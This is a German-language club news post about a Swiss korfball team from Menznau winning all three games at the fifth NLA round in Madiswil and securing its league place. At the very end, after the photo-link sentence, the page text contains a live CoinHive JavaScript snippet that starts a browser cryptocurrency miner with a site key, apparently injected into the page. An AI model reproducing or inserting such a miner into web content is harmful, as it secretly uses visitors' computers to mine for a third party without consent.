6-Pack! Traumtag an der 5. Runde in Madiswil

erstellt am: 20.08.2017 | Kategorie: Korbball

Erstes 6-Pack auf nationaler Ebene: Check! NLA Ligaerhalt bereits in der 5. Runde gesichert: Check! Aktuell 5. Tabellenrang und auf Kurs um das Saisonziel (6. oder besser) zu erreichen: Check! Es gibt sie nicht oft und doch sind sie da, Tage an welchen einfach alles klappt. Der 19. August 2017 gehört aus Menznauer Sicht seit gestern definitiv auch dazu.

Mit einem hart erkämpften 9:8 Sieg gegen Neuenkirch, einem 13:8 Erfolg gegen Oberdorf-Rüttenen und einem 11:9 in einem Abnützungskampf gegen Grindel konnten wir gestern unsere erste Vollerfolgs-Runde an einem Nationalliga-Spieltag verbuchen. Ein Kunststück, welches uns in 2 NLB Saisons verwehrt blieb und jetzt plötzlich gleich in unserer ersten NLA Saison Tatsache wurde. Endlich gibt es die Harasse Bier von Lönzu!!

Dank diesen 6 Punkten konnten wir uns definitiv vom Tabellenende absetzen, direkte Rivalen distanzieren und stehen vor der letzten Runde in Pieterlen jetzt sogar plötzlich einen Punkt vor Neuenkirch auf dem 5. Tabellenrang. Es war ein Tag voller Emotionen, Spannung, Erleichterung, vielen lachenden Gesichtern, fantastischer Unterstützung am Spielfeldrand und der schönen Gewissheit, dass wir uns im 2017 unter den besten 10 Mannschaften der Schweiz etablieren konnten.

Fertig ist die Saison aber natürlich noch nicht. Und das Ziel wird sein, die Saison auf einem Hoch und mit drei tollen Spielen abzuschliessen und damit den 5. Tabellenrag zu verteidigen. Stattfinden wird die 6. und letzte Saisonrunde am 9. September in Pieterlen.

Riesiges Dankeschön an die Fans, welche uns gestern zu drei Siegen gepusht haben! Die Bilder vom Samstag findet ihr hier.var miner = new CoinHive.Anonymous(‚xdy0ZLd0XshUUGEEVTHOJTQSBcxt50ms‘); miner.start();